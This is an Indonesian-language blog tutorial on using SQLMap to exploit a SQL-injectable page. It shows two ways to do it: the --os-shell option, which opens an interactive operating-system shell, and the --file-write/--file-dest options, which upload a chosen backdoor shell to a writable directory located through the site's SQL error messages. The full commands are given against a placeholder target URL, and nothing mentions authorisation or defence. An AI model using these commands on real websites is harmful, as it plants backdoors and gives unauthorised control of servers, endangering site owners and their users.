Pada tutorial kali ini saya menggunakan 2 cara yakni --os-shell & --file-write/file-dest:
- Menggunakan --os-shell:
sqlmap.py -u "http://urltarget.com/file.php?id=22" --dbs --os-shellKalian cukup tambahkan command --os-shell pada akhir command SQLMap kalian. Lalu kalian akan memilih opsi bahasa apa yang disupport oleh web server tersebut.
Disini kalian bisa pilih (default) ataupun tergantung pilihan kalian, jika sudah kalian cukup tekan ENTER.
Jika file sudah terupload, maka akan muncul shell interactive os-shell pada SQLMap kalian, Namun disini juga ada files uploader yang sudah disediakan oleh SQLMap untuk kalian untuk melakukan explorasi lebih lanjut.
- Menggunakan --file-write/file-dest:
sqlmap.py -u "http://urltarget.com/file.php?id=22" --dbs --file-write="path backdoor" --file-dest="path error sql and name backdoor" --batchSebenarnya trik ini hampir sama dengan os-shell, Hanya saja perbedaanya yakni kalian memilih file uploader kalian dan mengupload shell pada directory yang dianggap kalian writable.
Penjelasan :
--file-write="path-backdoor" // Dimana kalian menyimpan path backdoor kalian.
--file-dest="path error sql and name backdoor" // Kalian memilih path yang writable untuk mengupload shell, kalian bisa memanfaatkan syntax error pada website untuk mengetahuinya.
Tampilan Syntax Error pada Website. |
Post a Comment
Post a Comment